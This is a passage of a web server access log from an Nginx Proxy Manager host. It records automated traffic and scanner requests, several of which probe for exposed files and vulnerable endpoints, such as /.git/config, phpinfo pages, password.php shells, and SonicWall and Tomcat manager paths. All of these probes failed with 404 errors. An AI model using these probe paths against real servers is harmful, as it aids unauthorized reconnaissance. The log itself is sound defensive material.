like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:14:25:45 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.149.254.85] [Length 1033] [Gzip -] "-" "-" +[21/Jan/2026:14:35:38 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:14:36:49 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:14:39:09 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 135.237.127.225] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:14:45:34 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:14:46:02 +0000] 400 - GET http 91.82.83.208 "/" [Client 199.45.154.143] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[21/Jan/2026:14:46:03 +0000] 400 - - http localhost "-" [Client 199.45.154.143] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:14:46:08 +0000] 400 - GET http 91.82.83.208 "/sitemap.xml" [Client 199.45.154.143] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[21/Jan/2026:14:48:17 +0000] 200 - GET http 91.82.83.208 "/" [Client 148.227.90.177] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" "-" +[21/Jan/2026:14:55:01 +0000] 200 - GET http 91.82.83.208 "/" [Client 189.18.29.170] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 OPR/106.0.0." "-" +[21/Jan/2026:14:56:49 +0000] 200 - GET http 91.82.83.208 "/" [Client 176.65.148.247] [Length 1033] [Gzip -] "-" "-" +[21/Jan/2026:15:11:48 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:15:12:02 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:15:16:02 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:15:19:53 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:15:31:35 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:15:31:40 +0000] 405 - POST http 91.82.83.208 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[21/Jan/2026:15:36:34 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:15:56:24 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.61.209.92] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:15:57:40 +0000] 200 - GET http 91.82.83.208 "/" [Client 194.163.150.79] [Length 568] [Gzip 1.86] "Python/3.12 aiohttp/3.13.3" "-" +[21/Jan/2026:15:58:01 +0000] 200 - GET http 91.82.83.208 "/" [Client 23.109.58.53] [Length 1033] [Gzip -] "-" "-" +[21/Jan/2026:15:59:45 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:16:03:23 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 216.180.246.62] [Length 1033] [Gzip -] "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'" "-" +[21/Jan/2026:16:03:36 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 216.180.246.62] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:16:04:05 +0000] 200 - GET http 91.82.83.208 "/" [Client 216.180.246.62] [Length 568] [Gzip 1.86] "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'" "-" +[21/Jan/2026:16:04:40 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:16:05:51 +0000] 400 - GET http 91.82.83.208 "/" [Client 203.55.131.5] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36" "-" +[21/Jan/2026:16:06:26 +0000] 200 - GET http 91.82.83.208 "/" [Client 104.248.117.231] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" +[21/Jan/2026:16:06:40 +0000] 200 - GET http 91.82.83.208 "/" [Client 143.198.167.200] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" +[21/Jan/2026:16:06:54 +0000] 404 - GET http 91.82.83.208 "/vpn/js/rdx/core/lang/rdx_en.json.gz" [Client 23.92.30.34] [Length 552] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" +[21/Jan/2026:16:07:06 +0000] 404 - POST http 91.82.83.208 "/wsman" [Client 45.56.115.40] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" +[21/Jan/2026:16:07:56 +0000] 200 - GET http 91.82.83.208 "/" [Client 45.79.207.79] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" +[21/Jan/2026:16:07:56 +0000] 404 - GET http 91.82.83.208 "/_layouts/15/error.aspx" [Client 45.79.207.79] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" +[21/Jan/2026:16:08:11 +0000] 200 - GET http 91.82.83.208 "/" [Client 50.116.48.28] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" +[21/Jan/2026:16:08:11 +0000] 404 - GET http 91.82.83.208 "/auth.html" [Client 50.116.48.28] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" +[21/Jan/2026:16:08:11 +0000] 404 - GET http 91.82.83.208 "/auth1.html" [Client 50.116.48.28] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" +[21/Jan/2026:16:08:11 +0000] 404 - GET http 91.82.83.208 "/sslvpnLogin.html" [Client 50.116.48.28] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" +[21/Jan/2026:16:08:11 +0000] 404 - GET http 91.82.83.208 "/api/sonicos/auth" [Client 50.116.48.28] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" +[21/Jan/2026:16:08:12 +0000] 404 - GET http 91.82.83.208 "/api/sonicos/tfa" [Client 50.116.48.28] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" +[21/Jan/2026:16:08:15 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 45.56.126.36] [Length 1033] [Gzip -] "-" "-" +[21/Jan/2026:16:08:29 +0000] 200 - GET http 91.82.83.208 "/" [Client 173.255.220.133] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" "-" +[21/Jan/2026:16:08:30 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[21/Jan/2026:16:09:03 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 167.99.158.116] [Length 1033] [Gzip -] "-" "-" +[21/Jan/2026:16:09:03 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.99.158.116] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:16:09:04 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.99.158.116] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:16:09:04 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.99.158.116] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:16:09:04 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.99.158.116] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:16:09:04 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.99.158.116] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:16:09:04 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.99.158.116] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:16:09:05 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.99.158.116] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:16:09:05 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.99.158.116] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:16:09:05 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.99.158.116] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:16:09:05 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.99.158.116] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:16:09:05 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.99.158.116] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:16:09:06 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.99.158.116] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:16:09:11 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:16:10:21 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 216.180.246.62] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:16:12:00 +0000] 200 - GET http 91.82.83.208 "/" [Client 173.255.220.133] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" "-" +[21/Jan/2026:16:14:34 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:16:15:23 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.18] [Length 1033] [Gzip -] "-" "-" +[21/Jan/2026:16:24:31 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.38] [Length 1033] [Gzip -] "-" "-" +[21/Jan/2026:16:29:06 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:16:30:10 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:16:32:00 +0000] 200 - GET http profibot.direct.quickconnect.to "/" [Client 34.16.132.163] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "-" +[21/Jan/2026:16:51:06 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:16:53:20 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:16:53:57 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:17:08:06 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:17:19:17 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.46] [Length 1033] [Gzip -] "Mozilla/1.0" "-" +[21/Jan/2026:17:20:05 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:17:31:05 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:17:36:57 +0000] 200 - GET http 91.82.83.208 "/" [Client 43.164.197.209] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[21/Jan/2026:17:37:36 +0000] 404 - GET http 91.82.83.208 "/bins/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:17:39:57 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:17:40:49 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:17:43:00 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:17:43:19 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:18:04:38 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:18:08:54 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:18:17:21 +0000] 200 - GET http 91.82.83.208 "/" [Client 212.237.112.109] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" "-" +[21/Jan/2026:18:26:18 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:18:35:28 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:18:36:43 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:18:37:32 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:18:45:26 +0000] 404 - GET http 91.82.83.208 "/.git/config" [Client 167.99.210.13] [Length 183] [Gzip 3.21] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" +[21/Jan/2026:18:51:13 +0000] 200 - GET http 91.82.83.208 "/" [Client 54.164.46.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36" "-" +[21/Jan/2026:18:59:23 +0000] 405 - POST http 91.82.83.208 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[21/Jan/2026:19:00:10 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:19:01:31 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:19:05:25 +0000] 200 - GET http 91.82.83.208 "/" [Client 151.242.144.223] [Length 568] [Gzip 1.86] "-" "-" +[21/Jan/2026:19:11:47 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:19:13:54 +0000] 404 - GET http 91.82.83.208 "/_profiler/phpinfo" [Client 195.178.110.246] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Linux; Android 9; SM-G955F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36" "-" +[21/Jan/2026:19:16:23 +0000] 400 - GET http 91.82.83.208 "/" [Client 193.174.89.19] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" +[21/Jan/2026:19:16:23 +0000] 400 - GET http 91.82.83.208 "/app/" [Client 193.174.89.19] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" +[21/Jan/2026:19:22:38 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:19:25:04 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:19:27:50 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:19:40:48 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 146.190.93.166] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:19:40:48 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 146.190.93.166] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:19:40:49 +0000] 200 - GET http 91.82.83.208 "/" [Client 146.190.93.166] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[21/Jan/2026:19:40:49 +0000] 404 - GET http 91.82.83.208 "/form.html" [Client 146.190.93.166] [Length 122] [Gzip 1.35] "curl/8.1.2" "-" +[21/Jan/2026:19:40:50 +0000] 404 - GET http 91.82.83.208 "/upl.php" [Client 146.190.93.166] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[21/Jan/2026:19:40:51 +0000] 404 - GET http 91.82.83.208 "/t4" [Client 146.190.93.166] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[21/Jan/2026:19:40:51 +0000] 404 - GET http 91.82.83.208 "/geoip/" [Client 146.190.93.166] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[21/Jan/2026:19:40:52 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[21/Jan/2026:19:40:53 +0000] 404 - GET http 91.82.83.208 "/1.php" [Client 146.190.93.166] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[21/Jan/2026:19:40:54 +0000] 404 - GET http 91.82.83.208 "/systembc/password.php" [Client 146.190.93.166] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[21/Jan/2026:19:40:55 +0000] 404 - GET http 91.82.83.208 "/password.php" [Client 146.190.93.166] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[21/Jan/2026:19:47:24 +0000] 200 - GET http 91.82.83.208 "/" [Client 34.14.118.150] [Length 568] [Gzip 1.86] "python-requests/2.32.5" "-" +[21/Jan/2026:19:50:33 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:19:51:30 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:19:56:28 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 204.76.203.6] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:19:58:57 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:20:01:23 +0000] 404 - GET http 91.82.83.208 "/manager/text/list" [Client 20.65.194.167] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[21/Jan/2026:20:01:54 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 93.174.93.12] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:20:01:56 +0000] 200 - GET http 91.82.83.208 "/" [Client 176.65.148.247] [Length 1033] [Gzip -] "-" "-" +[21/Jan/2026:20:12:55 +0000] 200 - GET http 91.82.83.208 "/" [Client 165.154.226.51] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[21/Jan/2026:20:12:59 +0000] 400 - GET http 91.82.83.208 "/" [Client 206.189.25.33] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like 